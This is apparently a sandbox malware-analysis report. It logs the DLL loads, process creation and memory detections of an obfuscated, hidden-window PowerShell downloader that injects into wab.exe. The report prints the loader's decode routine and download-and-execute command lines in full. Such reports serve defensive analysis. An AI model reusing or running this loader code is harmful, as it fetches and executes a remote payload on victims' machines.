Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ source: powershell.exe, 00000006.00000002.2614520211.0000000008120000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb( source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2614936555.0000000008173000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb' source: powershell.exe, 00000006.00000002.2591214496.00000000029EC000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match | File source: 00000006.00000002.2616022619.000000000A044000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.3357542132.0000000005144000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2615577920.0000000008440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2609130468.000000000573F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Conflate)$global:Amputees = [System.Text.Encoding]::ASCII.GetString($Albinoen)$global:Alvan=$Amputees.substring($Programpakke,$Leath)<#Prebendaryship Overrestrict Rebottle Exhumated
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Paaflge $Distingu $Drikningerne), (Expositing @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Palaquium = [AppDomain]::CurrentDomain.GetAssemblies()$global
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afbinding)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Buccinatory, $false).DefineType($Solstrejf, $Bl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Conflate)$global:Amputees = [System.Text.Encoding]::ASCII.GetString($Albinoen)$global:Alvan=$Amputees.substring($Programpakke,$Leath)<#Prebendaryship Overrestrict Rebottle Exhumated
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. 
Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG 